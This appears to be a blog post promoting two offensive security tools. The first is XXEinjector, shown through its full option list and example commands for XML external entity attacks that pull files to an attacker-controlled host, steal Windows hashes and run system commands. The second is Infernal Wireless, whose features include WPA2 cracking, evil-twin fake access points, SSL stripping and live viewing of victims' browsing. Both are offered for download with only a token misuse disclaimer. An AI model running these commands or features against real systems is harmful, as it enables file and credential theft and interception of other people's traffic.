Monday 1 February 2016


XXEinjector automates retrieving files using direct and out of band methods. Directory listing only works in Java applications. Bruteforcing method needs to be used for other applications.  


  --host        Mandatory - our IP address for reverse connections. (--host=
  --file        Mandatory - file containing valid HTTP request with xml. You can also mark with "XXEINJECT" a point where DTD should be injected. (--file=/tmp/req.txt)
  --path        Mandatory if enumerating directories - Path to enumerate. (--path=/etc)
  --brute       Mandatory if bruteforcing files - File with paths to bruteforce. (--brute=/tmp/brute.txt)
  --logger      Log results only. Do not send requests. HTTP logger looks for "p" parameter with results.

  --rhost       Remote host's IP address or domain name. Use this argument only for requests without Host header. (--rhost=
  --rport       Remote host's TCP port. Use this argument only for requests without Host header and for non-default values. (--rport=8080)

  --oob         Out of Band exploitation method. FTP is default. FTP can be used in any application. HTTP can be used for bruteforcing and enumeration through directory listing in Java < 1.7 applications. Gopher can only be used in Java < 1.7 applications. (--oob=http/ftp/gopher)
  --direct      Use direct exploitation instead of out of band. Unique mark should be specified as a value for this argument. This mark specifies where results of XXE start and end. Specify --xml to see how XML in request file should look like. (--direct=UNIQUEMARK)
  --2ndfile     File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)
  --phpfilter   Use PHP filter to base64 encode target file before sending.
  --netdoc      Use netdoc protocol instead of file (Java).
  --enumports   Enumerating unfiltered ports for reverse connection. Specify value "all" to enumerate all TCP ports. (--enumports=21,22,80,443,445)

  --hashes      Steals Windows hash of the user that runs an application.
  --expect      Uses PHP expect extension to execute arbitrary system command. Best works with HTTP and PHP filter. (--expect=ls)
  --upload      Uploads specified file using Java jar schema into temp file. (--upload=/tmp/upload.txt)
  --xslt        Tests for XSLT injection.

  --ssl         Use SSL.
  --proxy       Proxy to use. (--proxy=
  --httpport    Set custom HTTP port. (--httpport=80)
  --ftpport     Set custom FTP port. (--ftpport=21)
  --gopherport  Set custom gopher port. (--gopherport=70)
  --jarport     Set custom port for uploading files using jar. (--jarport=1337)
  --xsltport    Set custom port for XSLT injection test. (--xsltport=1337)

  --test        This mode shows request with injected payload and quits. Used to verify correctness of request without sending it to a server.
  --urlencode   URL encode injected DTD. This is default for URI.
  --nodtd       If you want to put DTD in request by yourself. Specify "--dtd" to show how DTD should look like.
  --output      Output file for bruteforcing and logger mode. By default it logs to brute.log in current directory. (--output=/tmp/out.txt)
  --timeout     Timeout for receiving file/directory content. (--timeout=20)
  --contimeout  Timeout for closing connection with server. This is used to prevent DoS condition. (--contimeout=20)
  --fast        Skip asking what to enumerate. Prone to false-positives.
  --verbose     Show verbose messages.

Example usage:

  Enumerating /etc directory in HTTPS application:
  ruby XXEinjector.rb --host= --path=/etc --file=/tmp/req.txt --ssl
  Enumerating /etc directory using gopher for OOB method:
  ruby XXEinjector.rb --host= --path=/etc --file=/tmp/req.txt --oob=gopher
  Second order exploitation:
  ruby XXEinjector.rb --host= --path=/etc --file=/tmp/vulnreq.txt --2ndfile=/tmp/2ndreq.txt
  Bruteforcing files using HTTP out of band method and netdoc protocol:
  ruby XXEinjector.rb --host= --brute=/tmp/filenames.txt --file=/tmp/req.txt --oob=http --netdoc
  Enumerating using direct exploitation:
  ruby XXEinjector.rb --file=/tmp/req.txt --path=/etc --direct=UNIQUEMARK
  Enumerating unfiltered ports:
  ruby XXEinjector.rb --host= --file=/tmp/req.txt --enumports=all
  Stealing Windows hashes:
  ruby XXEinjector.rb --host= --file=/tmp/req.txt --hashes
  Uploading files using Java jar:
  ruby XXEinjector.rb --host= --file=/tmp/req.txt --upload=/tmp/uploadfile.pdf
  Executing system commands using PHP expect:
  ruby XXEinjector.rb --host= --file=/tmp/req.txt --oob=http --phpfilter --expect=ls
  Testing for XSLT injection:
  ruby XXEinjector.rb --host= --file=/tmp/req.txt --xslt
  Log requests only:
  ruby XXEinjector.rb --logger --oob=http --output=/tmp/out.txt 

Download tool :

Automated Wireless Hacking Tool

This tool is created to aid the penetration testers in assessing wireless security. Author is not responsible for misuse. Please read instructions thoroughly.
Usage: python (from the same folder where your code exists) 

Note: Please make sure to run the 'configure under File menu to install required software'
Recent Bug Fixes:
  • Display Scanned network with BSSID and Channel
  • WPA2 hacking is now captured by automatically setting an appropriate Channel
  • Aireplay issue is resolved during deauthentication stage due to channel settings in airodump
  • SSID selecting during WPA2 hacking is resolved (extra symbol was being added)
  • One import was removed by mistake but now it is resolved.
  • Frame size is enlarged slightly, as it was hiding a button
  • User interaction during Fake Access Points creation. This will let the user to choose the outbout interface for the internet, Evil Twin, Infernal Wireless and Free Internet
  • NAT rules for Fake APs are improved
  • Catch and Error implemented for Infernal Wireless Attack
  • Evil Twin Attack is improved. Now lets the user to choose outbound interface
New Addition:
  • Extra Menu is added to kill airodump-ng from GUI, previously it was shutting down the whole tool.
  • Added a feature to let the user decide how many packets to send for deauthentication during WPA2 Hacking
  • Added a logo
  • During MiTM via Fake AP, you can see the victim's browser live on the GUI panel
  • During MiTM, now you can see the HTTP request and responses live on the GUI panel


I have a problem with connecting to the Database

(Thanks to @lightos for this fix)
There seem to be few issues with Database connectivity. The solution is to create a new user on the database and use that user for launching the tool. Follow the following steps.
  1. Delete dbconnect.conf file from the Infernalwireless folder
  2. Run the following command from your mysql console.
    mysql>use mysql;
    mysql>CREATE USER 'root2'@'localhost' IDENTIFIED BY 'enter the new password here';
    mysql>GRANT ALL PRIVILEGES ON \*.\* TO 'root2'@'localhost' WITH GRANT OPTION;
  3. Try to run the tool again.

Release Notes:

New Features:

  • GUI Wireless security assessment SUIT
  • Impelemented
  • WPA2 hacking
  • WEP Hacking
  • WPA2 Enterprise hacking
  • Wireless Social Engineering
  • SSL Strip
  • Report generation
  • PDF Report
  • HTML Report
  • Note taking function
  • Data is saved into Database
  • Network mapping
  • MiTM
  • Probe Request


  • Improved compatibility
  • Report improvement
  • Better NAT Rules

Download tool :